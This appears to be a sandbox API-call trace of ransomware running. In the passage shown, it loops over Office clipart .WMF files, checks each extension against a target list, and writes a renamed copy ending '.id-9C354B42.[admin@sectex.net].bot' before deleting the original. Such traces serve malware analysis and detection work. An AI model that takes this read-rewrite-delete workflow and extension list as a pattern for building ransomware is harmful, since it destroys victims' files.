	[0159.678] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106816.WMF") returned 63
	[0159.678] lstrlenW (lpString=".jpg") returned 4
	[0159.678] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.679] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.679] lstrlenW (lpString="J0106958.WMF") returned 12
	[0159.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.680] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13784) returned 1
	[0159.680] CloseHandle (hObject=0x3d0) returned 1
	[0159.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf")) returned 0x20
	[0159.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.680] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.681] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.681] GetLastError () returned 0x0
	[0159.681] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x35d8, lpOverlapped=0x0) returned 1
	[0159.683] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x35e0, lpOverlapped=0x0) returned 1
	[0159.684] ReadFile (in: hFile=0x3d0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.684] WriteFile (in: hFile=0x3c4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.685] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.685] CloseHandle (hObject=0x3c4) returned 1
	[0159.685] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.685] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.687] CloseHandle (hObject=0x3d0) returned 1
	[0159.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106958.wmf")) returned 1
	[0159.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.688] lstrlenW (lpString=".doc") returned 4
	[0159.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.688] lstrlenW (lpString=".docx") returned 5
	[0159.688] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.688] lstrlenW (lpString=".pdf") returned 4
	[0159.688] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.688] lstrlenW (lpString=".xls") returned 4
	[0159.688] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.688] lstrlenW (lpString=".xlsx") returned 5
	[0159.688] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.688] lstrlenW (lpString=".ppt") returned 4
	[0159.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.688] lstrlenW (lpString=".zip") returned 4
	[0159.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.688] lstrlenW (lpString=".rar") returned 4
	[0159.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString=".bz2") returned 4
	[0159.925] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString=".7z") returned 3
	[0159.925] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.925] lstrlenW (lpString=".dbf") returned 4
	[0159.925] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.925] lstrlenW (lpString=".1cd") returned 4
	[0159.925] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.925] lstrlenW (lpString=".jpg") returned 4
	[0159.925] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.925] lstrlenW (lpString=".doc") returned 4
	[0159.925] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString=".docx") returned 5
	[0159.925] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.925] lstrlenW (lpString=".pdf") returned 4
	[0159.925] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.925] lstrlenW (lpString=".xls") returned 4
	[0159.925] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.926] lstrlenW (lpString=".xlsx") returned 5
	[0159.926] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.926] lstrlenW (lpString=".ppt") returned 4
	[0159.926] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.926] lstrlenW (lpString=".zip") returned 4
	[0159.926] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.926] lstrlenW (lpString=".rar") returned 4
	[0159.926] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.926] lstrlenW (lpString=".bz2") returned 4
	[0159.926] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.926] lstrlenW (lpString=".7z") returned 3
	[0159.926] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.926] lstrlenW (lpString=".dbf") returned 4
	[0159.926] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.926] lstrlenW (lpString=".1cd") returned 4
	[0159.926] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63
	[0159.926] lstrlenW (lpString=".jpg") returned 4
	[0159.926] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.926] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.926] lstrlenW (lpString="J0107026.WMF") returned 12
	[0159.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.948] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7632) returned 1
	[0159.948] CloseHandle (hObject=0x398) returned 1
	[0159.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf")) returned 0x20
	[0159.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.949] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.949] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0160.001] GetLastError () returned 0x0
	[0160.001] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1dd0, lpOverlapped=0x0) returned 1
	[0160.031] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1de0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1de0, lpOverlapped=0x0) returned 1
	[0160.032] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.033] WriteFile (in: hFile=0x3b8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.033] SetEndOfFile (hFile=0x3b8) returned 1
	[0160.033] CloseHandle (hObject=0x3b8) returned 1
	[0160.033] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.033] SetEndOfFile (hFile=0x398) returned 1
	[0160.035] CloseHandle (hObject=0x398) returned 1
	[0160.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.035] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107026.wmf")) returned 1
	[0160.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.036] lstrlenW (lpString=".doc") returned 4
	[0160.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.036] lstrlenW (lpString=".docx") returned 5
	[0160.036] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0160.036] lstrlenW (lpString=".pdf") returned 4
	[0160.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.036] lstrlenW (lpString=".xls") returned 4
	[0160.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.036] lstrlenW (lpString=".xlsx") returned 5
	[0160.036] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0160.036] lstrlenW (lpString=".ppt") returned 4
	[0160.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.036] lstrlenW (lpString=".zip") returned 4
	[0160.036] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.036] lstrlenW (lpString=".rar") returned 4
	[0160.036] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.036] lstrlenW (lpString=".bz2") returned 4
	[0160.036] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.036] lstrlenW (lpString=".7z") returned 3
	[0160.037] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString=".dbf") returned 4
	[0160.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString=".1cd") returned 4
	[0160.037] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString=".jpg") returned 4
	[0160.037] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString=".doc") returned 4
	[0160.037] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString=".docx") returned 5
	[0160.037] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0160.037] lstrlenW (lpString=".pdf") returned 4
	[0160.037] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString=".xls") returned 4
	[0160.037] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.037] lstrlenW (lpString=".xlsx") returned 5
	[0160.037] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0160.037] lstrlenW (lpString=".ppt") returned 4
	[0160.037] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.037] lstrlenW (lpString=".zip") returned 4
	[0160.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.037] lstrlenW (lpString=".rar") returned 4
	[0160.037] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.037] lstrlenW (lpString=".bz2") returned 4
	[0160.038] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.038] lstrlenW (lpString=".7z") returned 3
	[0160.038] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.038] lstrlenW (lpString=".dbf") returned 4
	[0160.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.038] lstrlenW (lpString=".1cd") returned 4
	[0160.038] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107026.WMF") returned 63
	[0160.038] lstrlenW (lpString=".jpg") returned 4
	[0160.038] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.038] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.038] lstrlenW (lpString="J0107138.WMF") returned 12
	[0160.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.060] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=17200) returned 1
	[0160.061] CloseHandle (hObject=0x37c) returned 1
	[0160.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf")) returned 0x20
	[0160.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0160.172] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.172] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.682] GetLastError () returned 0x0
	[0160.682] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4330, lpOverlapped=0x0) returned 1
	[0160.685] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4340, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4340, lpOverlapped=0x0) returned 1
	[0160.688] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.688] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.688] SetEndOfFile (hFile=0x25c) returned 1
	[0161.023] CloseHandle (hObject=0x25c) returned 1
	[0161.024] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.024] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.026] CloseHandle (hObject=0x1d8) returned 1
	[0161.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107138.wmf")) returned 1
	[0161.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.035] lstrlenW (lpString=".doc") returned 4
	[0161.035] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.035] lstrlenW (lpString=".docx") returned 5
	[0161.035] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.035] lstrlenW (lpString=".pdf") returned 4
	[0161.035] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.035] lstrlenW (lpString=".xls") returned 4
	[0161.035] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.035] lstrlenW (lpString=".xlsx") returned 5
	[0161.035] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.035] lstrlenW (lpString=".ppt") returned 4
	[0161.035] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.035] lstrlenW (lpString=".zip") returned 4
	[0161.035] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.035] lstrlenW (lpString=".rar") returned 4
	[0161.035] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.035] lstrlenW (lpString=".bz2") returned 4
	[0161.035] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.035] lstrlenW (lpString=".7z") returned 3
	[0161.035] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString=".dbf") returned 4
	[0161.036] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString=".1cd") returned 4
	[0161.036] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString=".jpg") returned 4
	[0161.036] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString=".doc") returned 4
	[0161.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString=".docx") returned 5
	[0161.036] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.036] lstrlenW (lpString=".pdf") returned 4
	[0161.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString=".xls") returned 4
	[0161.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.036] lstrlenW (lpString=".xlsx") returned 5
	[0161.036] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.036] lstrlenW (lpString=".ppt") returned 4
	[0161.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.036] lstrlenW (lpString=".zip") returned 4
	[0161.036] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.036] lstrlenW (lpString=".rar") returned 4
	[0161.036] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString=".bz2") returned 4
	[0161.036] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.036] lstrlenW (lpString=".7z") returned 3
	[0161.037] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.037] lstrlenW (lpString=".dbf") returned 4
	[0161.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.037] lstrlenW (lpString=".1cd") returned 4
	[0161.037] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107138.WMF") returned 63
	[0161.037] lstrlenW (lpString=".jpg") returned 4
	[0161.037] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.037] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.037] lstrlenW (lpString="J0107262.WMF") returned 12
